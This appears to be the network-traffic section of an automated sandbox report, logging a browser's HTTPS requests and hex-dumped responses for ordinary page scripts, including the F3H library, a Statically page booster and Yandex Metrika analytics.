                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10041-SJC, cache-fra19141-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8788INData Raw: 31 65 38 34 0d 0a 2f 2a 21 0a 20 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 20 46 33 48 20 31 2e 30 2e 31 32 0a 20 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 41 75 74 68 6f 72 3a 20 54 61 75 66 69 6b 20 4e 75 72 72 6f 68 6d 61 6e 20 3c 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 61 75 66 69 6b 2d 6e 75 72 72 6f 68 6d 61 6e 3e 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 4d 49 54 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                              Data Ascii: 1e84/*! * ============================================================== * F3H 1.0.12 * ============================================================== * Author: Taufik Nurrohman <https://github.com/taufik-nurrohman> * License: MIT * -------------
                                                                                              2021-12-13 23:57:32 UTC8789INData Raw: 28 22 6c 69 6e 6b 5b 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 70 72 65 66 65 74 63 68 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 70 72 65 6c 6f 61 64 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 70 72 65 72 65 6e 64 65 72 5d 22 2c 65 29 2c 63 3d 30 2c 66 3d 73 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 2b 2b 63 29 6f 3d 72 3d 73 5b 63 5d 2c 76 6f 69 64 20 30 2c 75 3d 58 28 6e 29 2c 62 28 6f 2c 22 64 61 74 61 2d 22 2b 75 29 7c 7c 62 28 6f 2c 75 29 7c 7c 28 72 2e 69 64 3d 74 3d 72 2e 69 64 7c 7c 6e 2b 22 3a 22 2b 78 28 79 28 72 2c 22 68 72 65 66 22 29 7c 7c 6b 28 72 29 29 2c 69 5b 74 5d 3d 50 28 72 29 2c 69 5b 74 5d 5b 32 5d 2e 68 72 65 66 3d 72 2e 68 72 65 66 29 3b 72 65 74 75 72 6e
                                                                                              Data Ascii: ("link[rel=dns-prefetch],link[rel=preconnect],link[rel=prefetch],link[rel=preload],link[rel=prerender]",e),c=0,f=s.length;c<f;++c)o=r=s[c],void 0,u=X(n),b(o,"data-"+u)||b(o,u)||(r.id=t=r.id||n+":"+x(y(r,"href")||k(r)),i[t]=P(r),i[t][2].href=r.href);return
                                                                                              2021-12-13 23:57:32 UTC8790INData Raw: 29 2e 73 70 6c 69 74 28 2f 5b 5c 72 5c 6e 5d 2b 2f 29 3b 66 6f 72 28 74 20 69 6e 20 69 29 72 3d 58 28 28 6e 3d 69 5b 74 5d 2e 73 70 6c 69 74 28 22 3a 20 22 29 29 2e 73 68 69 66 74 28 29 29 2c 58 28 6f 3d 6e 2e 6a 6f 69 6e 28 22 3a 20 22 29 29 2c 75 5b 72 5d 3d 77 28 6f 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 78 79 28 75 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 5b 58 28 74 29 5d 7c 7c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 5b 58 28 74 29 5d 3d 6e 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 21 31 3d 3d 3d 65 3f 22 66 61 6c 73 65 22 3a 6e 75 6c 6c 3d 3d 3d 65 3f 22 6e 75 6c 6c 22 3a 21 30 3d 3d 3d 65 3f 22 74 72 75 65 22 3a 65 2b 22 22 7d
                                                                                              Data Ascii: ).split(/[\r\n]+/);for(t in i)r=X((n=i[t].split(": ")).shift()),X(o=n.join(": ")),u[r]=w(o);return new Proxy(u,{get:function(e,t){return e[X(t)]||null},set:function(e,t,n){e[X(t)]=n}})}function Q(e){return!1===e?"false":null===e?"null":!0===e?"true":e+""}
                                                                                              2021-12-13 23:57:32 UTC8792INData Raw: 28 61 29 2c 73 65 28 22 65 6e 74 65 72 22 2c 61 29 7d 29 2c 54 28 78 2c 22 65 72 72 6f 72 22 2c 68 29 2c 54 28 45 2c 22 6c 6f 61 64 22 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 41 28 29 2c 61 3d 5b 45 2e 72 65 73 70 6f 6e 73 65 2c 6e 5d 2c 6b 3d 45 2e 72 65 73 70 6f 6e 73 65 55 52 4c 2c 53 3e 3d 33 30 30 26 26 53 3c 34 30 30 29 7b 76 61 72 20 74 3d 55 28 6b 29 3b 72 65 74 75 72 6e 20 4c 5b 74 5d 26 26 64 65 6c 65 74 65 20 4c 5b 74 5d 2c 73 65 28 22 73 75 63 63 65 73 73 22 2c 61 29 2c 73 65 28 53 2c 61 29 2c 76 6f 69 64 20 56 28 67 3d 65 2c 69 2c 6b 7c 7c 6f 29 7d 74 65 28 2d 31 3d 3d 3d 6f 5b 6c 5d 28 22 23 22 29 26 26 6b 7c 7c 6f 29 2c 43 26 26 28 76 3d 69 65 28 61 5b 30 5d 29 29 2c 73 65 28 22 73 75 63 63 65 73 73 22 2c 61 29 2c 73 65 28 53 2c
                                                                                              Data Ascii: (a),se("enter",a)}),T(x,"error",h),T(E,"load",h=function(){if(A(),a=[E.response,n],k=E.responseURL,S>=300&&S<400){var t=U(k);return L[t]&&delete L[t],se("success",a),se(S,a),void V(g=e,i,k||o)}te(-1===o[l]("#")&&k||o),C&&(v=ie(a[0])),se("success",a),se(S,
                                                                                              2021-12-13 23:57:32 UTC8793INData Raw: 65 29 2c 63 3d 7b 7d 3b 66 6f 72 28 6f 20 69 6e 20 74 29 28 75 3d 71 28 22 23 22 2b 6f 5b 61 5d 28 2f 5b 3a 2e 5d 2f 67 2c 22 5c 5c 24 26 22 29 29 29 26 26 28 63 5b 6f 5d 3d 75 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 29 2c 73 5b 6f 5d 7c 7c 28 64 65 6c 65 74 65 20 74 5b 6f 5d 2c 42 28 49 28 6f 29 29 29 3b 66 6f 72 28 6f 20 69 6e 20 73 29 74 5b 6f 5d 7c 7c 28 74 5b 6f 5d 3d 69 3d 73 5b 6f 5d 2c 4d 28 46 28 69 29 2c 63 5b 6f 5d 2c 72 29 29 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 65 28 65 29 7b 72 65 74 75 72 6e 20 72 65 28 65 2c 70 2c 52 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 29 7b 72 65 74 75 72 6e 20 72 65 28 65 2c 64 2c 5f 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 69 65 28 65 29 7b 72 65 74 75 72 6e 20 72 65
                                                                                              Data Ascii: e),c={};for(o in t)(u=q("#"+o[a](/[:.]/g,"\\$&")))&&(c[o]=u.nextElementSibling),s[o]||(delete t[o],B(I(o)));for(o in s)t[o]||(t[o]=i=s[o],M(F(i),c[o],r));return t}function oe(e){return re(e,p,R,r)}function ue(e){return re(e,d,_,o)}function ie(e){return re
                                                                                              2021-12-13 23:57:32 UTC8794INData Raw: 5d 29 2c 79 2e 61 62 6f 72 74 28 29 7d 2c 79 2e 63 61 63 68 65 73 3d 4c 2c 79 2e 66 65 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 5a 28 6e 2c 74 2c 65 29 7d 2c 79 2e 66 69 72 65 3d 73 65 2c 79 2e 68 6f 6f 6b 73 3d 6b 2c 79 2e 6c 69 6e 6b 73 3d 7b 7d 2c 79 2e 6c 6f 74 3d 7b 7d 2c 79 2e 6f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 4e 28 65 29 29 72 65 74 75 72 6e 20 6b 3d 7b 7d 2c 79 3b 69 66 28 4e 28 6b 5b 65 5d 29 29 69 66 28 4e 28 74 29 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6b 5b 65 5d 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 2b 2b 6e 29 74 3d 3d 3d 6b 5b 65 5d 5b 6e 5d 26 26 6b 5b 65 5d 2e 73 70 6c 69 63 65 28 6e 2c 31 29 3b 30 3d 3d 3d 72 26 26 64 65 6c 65 74 65 20 6b 5b 65 5d 7d 65 6c 73
                                                                                              Data Ascii: ]),y.abort()},y.caches=L,y.fetch=function(e,t,n){return Z(n,t,e)},y.fire=se,y.hooks=k,y.links={},y.lot={},y.off=function(e,t){if(!N(e))return k={},y;if(N(k[e]))if(N(t)){for(var n=0,r=k[e].length;n<r;++n)t===k[e][n]&&k[e].splice(n,1);0===r&&delete k[e]}els
                                                                                              2021-12-13 23:57:32 UTC8795INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              28192.168.2.349789104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8758OUTGET /wp/p/statically/1.2.1/static/pagebooster.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8810INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a84d7c6901-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"60aed3672353b5e85503bd93d4ec79fc329ccc004ec768b73b29f031420a194a"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10036-SJC, cache-fra19161-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8811INData Raw: 38 33 62 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 77 69 6e 2c 64 6f 63 29 7b 66 75 6e 63 74 69 6f 6e 20 24 24 28 73 65 6c 65 63 74 6f 72 2c 72 6f 6f 74 29 7b 72 65 74 75 72 6e 28 72 6f 6f 74 7c 7c 64 6f 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 73 65 6c 65 63 74 6f 72 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 24 24 24 28 73 65 6c 65 63 74 6f 72 2c 72 6f 6f 74 29 7b 72 65 74 75 72 6e 28 72 6f 6f 74 7c 7c 64 6f 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 65 6c 65 63 74 6f 72 29 3b 7d 0a 6c 65 74 20 66 33 68 3d 6e 65 77 20 46 33 48 28 7b 74 75 72 62 6f 3a 46 33 48 2e 73 74 61 74 65 2e 73 74 61 74 69 63 61 6c 6c 79 2e 74 75 72 62 6f 2c 73 6f 75 72 63 65 73 3a 27 61 5b 68 72 65 66 5d 3a 6e 6f 74 28 5b 68 72 65 66 2a 3d 22 2f 77 70 2d 61 64
                                                                                              Data Ascii: 83b(function(win,doc){function $$(selector,root){return(root||doc).querySelector(selector);}function $$$(selector,root){return(root||doc).querySelectorAll(selector);}let f3h=new F3H({turbo:F3H.state.statically.turbo,sources:'a[href]:not([href*="/wp-ad
                                                                                              2021-12-13 23:57:32 UTC8812INData Raw: 6e 22 5d 27 29 2c 63 75 72 72 65 6e 74 52 6f 6f 74 3d 64 6f 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 66 33 68 2e 6f 6e 28 32 30 30 2c 66 75 6e 63 74 69 6f 6e 28 6e 65 78 74 29 7b 6c 65 74 20 6e 65 78 74 42 6f 64 79 3d 6e 65 78 74 2e 62 6f 64 79 2c 6e 65 78 74 45 6c 65 6d 65 6e 74 73 3d 24 24 24 28 46 33 48 2e 73 74 61 74 65 2e 73 74 61 74 69 63 61 6c 6c 79 2e 65 6c 65 6d 65 6e 74 73 54 6f 52 65 70 6c 61 63 65 2c 6e 65 78 74 29 2c 6e 65 78 74 4d 65 74 61 44 65 73 63 72 69 70 74 69 6f 6e 3d 24 24 28 27 6d 65 74 61 5b 63 6f 6e 74 65 6e 74 5d 5b 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 5d 27 2c 6e 65 78 74 29 2c 6e 65 78 74 4d 65 74 61 44 65 73 63 72 69 70 74 69 6f 6e 4f 47 3d 24 24 28 27 6d 65 74 61 5b 63 6f 6e 74 65 6e 74 5d 5b 6e
                                                                                              Data Ascii: n"]'),currentRoot=doc.documentElement;f3h.on(200,function(next){let nextBody=next.body,nextElements=$$$(F3H.state.statically.elementsToReplace,next),nextMetaDescription=$$('meta[content][name="description"]',next),nextMetaDescriptionOG=$$('meta[content][n
                                                                                              2021-12-13 23:57:32 UTC8813INData Raw: 63 72 69 70 74 43 6f 6e 74 65 6e 74 29 7c 7c 2f 5c 62 61 64 73 62 79 67 6f 6f 67 6c 65 5c 62 2f 2e 74 65 73 74 28 73 63 72 69 70 74 43 6f 6e 74 65 6e 74 29 29 7b 64 65 6c 65 74 65 20 73 63 72 69 70 74 73 5b 69 64 5d 3b 7d 7d 0a 69 66 28 73 63 72 69 70 74 53 6f 75 72 63 65 29 7b 69 66 28 46 33 48 2e 73 74 61 74 65 2e 73 74 61 74 69 63 61 6c 6c 79 2e 73 63 72 69 70 74 73 54 6f 52 65 66 72 65 73 68 2e 73 70 6c 69 74 28 2f 5c 73 2a 2c 5c 73 2a 2f 29 2e 69 6e 64 65 78 4f 66 28 73 63 72 69 70 74 53 6f 75 72 63 65 29 3e 2d 31 29 7b 64 65 6c 65 74 65 20 73 63 72 69 70 74 73 5b 69 64 5d 3b 7d 7d 7d 7d 0a 77 69 6e 2e 66 33 68 3d 66 33 68 3b 7d 29 28 74 68 69 73 2c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 29 3b 0d 0a
                                                                                              Data Ascii: criptContent)||/\badsbygoogle\b/.test(scriptContent)){delete scripts[id];}}if(scriptSource){if(F3H.state.statically.scriptsToRefresh.split(/\s*,\s*/).indexOf(scriptSource)>-1){delete scripts[id];}}}}win.f3h=f3h;})(this,this.document);
                                                                                              2021-12-13 23:57:32 UTC8813INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              29192.168.2.34979193.158.134.119443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:38 UTC8813OUTGET /metrika/watch.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: mc.yandex.ru
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:38 UTC8814INHTTP/1.1 200 OK
                                                                                              Accept-Ranges: bytes
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: max-age=3600
                                                                                              Connection: Close
                                                                                              Content-Length: 136754
                                                                                              Content-Type: application/javascript
                                                                                              Date: Mon, 13 Dec 2021 23:57:38 GMT
                                                                                              ETag: "61b73d3b-21632"
                                                                                              Expires: Tue, 14 Dec 2021 00:57:38 GMT
                                                                                              Last-Modified: Mon, 13 Dec 2021 15:31:55 GMT
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              2021-12-13 23:57:38 UTC8814INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 28 66 75 6e 63 74 69 6f 6e 28 4f 63 29 7b 66 75 6e 63 74 69 6f 6e 20 53 69 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 54 69 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 62 2c 64 2c 65 29 7b 72 65 74 75 72 6e 22 22 2b 62 2b 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 50 63 28 61 2c 63 29 7b 69 66 28 21 63 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 62 3d 4e 28 61 29 3b 72 65 74 75 72 6e 28 6e 65 77 20 52 65 67 45 78 70 28 63 29 29 2e 74 65 73 74 28 22 22 2b 62 2e 70 61 74 68 6e 61 6d 65 2b 62 2e 68 61 73 68 2b 62 2e 73 65 61 72 63 68 29 7d 66 75 6e 63 74 69 6f 6e 20 55 69 28 61 2c 63 29 7b 72 65 74 75 72 6e 20 45 61 28 61 2c 63 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 64 3d 6e 28 62 2c
                                                                                              Data Ascii: (function(){try{(function(Oc){function Si(a){return a.replace(Ti,function(c,b,d,e){return""+b+e})}function Pc(a,c){if(!c)return!1;var b=N(a);return(new RegExp(c)).test(""+b.pathname+b.hash+b.search)}function Ui(a,c){return Ea(a,c,function(b){var d=n(b,
                                                                                              2021-12-13 23:57:38 UTC8821INData Raw: 65 28 62 2c 5b 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 5d 2c 67 29 3b 65 28 61 2c 5b 22 6c 6f 61 64 22 5d 2c 67 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 6a 28 61 2c 63 29 7b 76 61 72 20 62 3d 42 6a 28 61 29 2c 64 3d 64 61 28 61 2c 22 72 22 2c 63 29 2c 65 3d 78 28 61 2c 22 72 74 73 2e 70 22 29 3b 72 65 74 75 72 6e 20 45 61 28 61 2c 63 2c 47 28 4f 2c 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 76 61 72 20 68 3d 7b 69 64 3a 67 2e 72 63 2c 4e 3a 67 2e 4e 7d 3b 68 3d 64 28 7b 4c 3a 67 2e 57 63 2c 46 3a 6a 61 28 67 2e 6f 63 29 2c 43 3a 67 2e 4b 2c 75 61 3a 67 2e 75 61 7d 2c 68 2c 67 2e 59 63 29 5b 22 63 61 74 63 68 22 5d 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 74 68 65 6e 28 77 28 68 2c 4c 29 29 7d 2c 49 2e 72 65 73 6f 6c 76 65 28 22 22
                                                                                              Data Ascii: e(b,["DOMContentLoaded"],g);e(a,["load"],g)}}function Aj(a,c){var b=Bj(a),d=da(a,"r",c),e=x(a,"rts.p");return Ea(a,c,G(O,null,function(f,g){var h={id:g.rc,N:g.N};h=d({L:g.Wc,F:ja(g.oc),C:g.K,ua:g.ua},h,g.Yc)["catch"](e);return f.then(w(h,L))},I.resolve(""
                                                                                              2021-12-13 23:57:38 UTC8829INData Raw: 0a 62 7c 7c 28 61 2e 70 61 72 61 6d 73 28 66 29 2c 67 2e 70 75 73 68 28 62 29 2c 64 2e 70 61 72 65 6e 74 26 26 63 2e 50 62 28 28 65 3d 7b 7d 2c 65 2e 74 79 70 65 3d 22 70 61 72 61 6d 73 22 2c 65 2e 64 61 74 61 3d 66 2c 65 29 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 66 28 61 2c 63 2c 62 29 7b 76 61 72 20 64 3d 6e 28 61 2c 22 41 70 70 4d 65 74 72 69 63 61 49 6e 69 74 69 61 6c 69 7a 65 72 22 29 2c 65 3d 6e 28 64 2c 22 69 6e 69 74 22 29 3b 69 66 28 65 29 74 72 79 7b 47 28 65 2c 64 29 28 6f 62 28 61 2c 63 29 29 7d 63 61 74 63 68 28 66 29 7b 7d 65 6c 73 65 20 5a 66 3d 68 61 28 61 2c 44 28 5b 61 2c 63 2c 32 2a 62 5d 2c 59 66 29 2c 62 2c 22 61 69 2e 64 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 61 28 61 2c 5a 66 29 7d
                                                                                              Data Ascii: b||(a.params(f),g.push(b),d.parent&&c.Pb((e={},e.type="params",e.data=f,e)))}}function Yf(a,c,b){var d=n(a,"AppMetricaInitializer"),e=n(d,"init");if(e)try{G(e,d)(ob(a,c))}catch(f){}else Zf=ha(a,D([a,c,2*b],Yf),b,"ai.d");return function(){return Ra(a,Zf)}
                                                                                              2021-12-13 23:57:38 UTC8837INData Raw: 74 75 72 6e 20 63 2e 63 61 6e 76 61 73 7d 5d 7d 66 75 6e 63 74 69 6f 6e 20 70 6a 28 61 2c 63 29 7b 69 66 28 21 50 28 61 2e 46 6c 6f 61 74 33 32 41 72 72 61 79 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 62 3d 6e 28 63 2c 22 63 61 6e 76 61 73 22 29 3b 69 66 28 21 62 7c 7c 21 6b 61 28 22 74 6f 44 61 74 61 55 72 6c 22 2c 62 2e 74 6f 44 61 74 61 55 52 4c 29 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 2e 63 72 65 61 74 65 42 75 66 66 65 72 28 29 7d 63 61 74 63 68 28 64 29 7b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 53 64 28 61 2c 63 29 7b 63 2e 63 6c 65 61 72 43 6f 6c 6f 72 28 30 2c 30 2c 30 2c 31 29 3b 63 2e 65 6e 61 62 6c 65 28 63 2e 44 45 50 54 48 5f 54 45 53 54 29 3b 63 2e 64 65 70 74 68 46 75 6e 63 28 63 2e 4c 45
                                                                                              Data Ascii: turn c.canvas}]}function pj(a,c){if(!P(a.Float32Array))return!1;var b=n(c,"canvas");if(!b||!ka("toDataUrl",b.toDataURL))return!1;try{c.createBuffer()}catch(d){return!1}return!0}function Sd(a,c){c.clearColor(0,0,0,1);c.enable(c.DEPTH_TEST);c.depthFunc(c.LE
                                                                                              2021-12-13 23:57:38 UTC8845INData Raw: 29 70 2b 3d 31 3b 64 2e 75 61 3d 70 3b 6d 5b 70 5d 3d 28 66 3d 7b 7d 2c 66 2e 70 72 6f 74 6f 63 6f 6c 3d 6c 61 2e 62 61 2c 66 2e 68 6f 73 74 3d 22 6d 63 2e 79 61 6e 64 65 78 2e 72 75 22 2c 66 2e 72 65 73 6f 75 72 63 65 3d 6b 3f 22 77 65 62 76 69 73 6f 72 22 3a 22 77 61 74 63 68 22 2c 66 2e 70 6f 73 74 50 61 72 61 6d 73 3d 64 2e 4c 2c 66 2e 74 69 6d 65 3d 6c 28 55 29 2c 66 2e 63 6f 75 6e 74 65 72 54 79 70 65 3d 62 2e 4e 2c 66 2e 70 61 72 61 6d 73 3d 68 2c 66 2e 62 72 6f 77 73 65 72 49 6e 66 6f 3d 67 2c 66 2e 63 6f 75 6e 74 65 72 49 64 3d 62 2e 69 64 2c 66 2e 67 68 69 64 3d 53 62 28 61 29 2c 66 29 3b 73 65 28 61 29 7d 7d 65 28 29 7d 2c 61 61 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 4c 67 28 61 2c 64 29 3b 65 28 29 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                              Data Ascii: )p+=1;d.ua=p;m[p]=(f={},f.protocol=la.ba,f.host="mc.yandex.ru",f.resource=k?"webvisor":"watch",f.postParams=d.L,f.time=l(U),f.counterType=b.N,f.params=h,f.browserInfo=g,f.counterId=b.id,f.ghid=Sb(a),f);se(a)}}e()},aa:function(d,e){Lg(a,d);e()}}}}function
                                                                                              2021-12-13 23:57:38 UTC8853INData Raw: 29 29 7d 29 3b 66 3d 62 2e 44 28 61 2c 5b 22 6d 65 73 73 61 67 65 22 5d 2c 64 29 3b 61 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 65 2c 22 2a 22 29 7d 65 6c 73 65 20 68 61 28 61 2c 63 2c 30 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 6c 28 61 2c 63 2c 62 2c 64 2c 65 2c 66 29 7b 76 6f 69 64 20 30 3d 3d 3d 64 26 26 28 64 3d 31 29 3b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 32 30 30 29 3b 76 6f 69 64 20 30 3d 3d 3d 66 26 26 28 66 3d 22 69 74 63 22 29 3b 63 3d 6f 65 28 63 2c 62 29 3b 48 67 28 61 2c 63 2c 64 2c 65 29 28 56 63 28 78 28 61 2c 66 29 2c 42 29 29 7d 66 75 6e 63 74 69 6f 6e 20 48 67 28 61 2c 63 2c 62 2c 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 66 28 67 2c 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 74 72 79 7b 76 61 72 20 6d 3d 63 28 65 28 61 2c
                                                                                              Data Ascii: ))});f=b.D(a,["message"],d);a.postMessage(e,"*")}else ha(a,c,0,d)}function Ol(a,c,b,d,e,f){void 0===d&&(d=1);void 0===e&&(e=200);void 0===f&&(f="itc");c=oe(c,b);Hg(a,c,d,e)(Vc(x(a,f),B))}function Hg(a,c,b,d,e){function f(g,h){function k(){try{var m=c(e(a,
                                                                                              2021-12-13 23:57:38 UTC8861INData Raw: 61 64 22 29 3b 6b 26 26 6b 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 68 29 7d 68 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 66 2c 68 2e 66 69 72 73 74 43 68 69 6c 64 29 3b 72 65 74 75 72 6e 20 66 7d 63 61 74 63 68 28 6c 29 7b 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6d 6d 28 61 2c 63 2c 62 29 7b 76 61 72 20 64 3d 70 68 28 63 29 3b 4b 28 62 2c 64 2e 68 61 29 7c 7c 64 2e 68 61 2e 70 75 73 68 28 62 29 3b 69 66 28 4a 61 28 64 2e 66 61 29 29 7b 62 3d 59 61 28 61 29 3b 69 66 28 21 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 62 3d 62 28 22 69 66 72 61 6d 65 22 29 3b 46 28 62 2e 73 74 79 6c 65 2c 7b 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 2c 77 69 64 74 68 3a 22 31 70 78 22 2c 68 65 69 67 68 74 3a 22 31 70 78 22 2c 76 69 73 69 62 69 6c 69 74 79 3a 22 68 69 64 64 65 6e 22
                                                                                              Data Ascii: ad");k&&k.appendChild(h)}h.insertBefore(f,h.firstChild);return f}catch(l){}}}function mm(a,c,b){var d=ph(c);K(b,d.ha)||d.ha.push(b);if(Ja(d.fa)){b=Ya(a);if(!b)return null;b=b("iframe");F(b.style,{display:"none",width:"1px",height:"1px",visibility:"hidden"
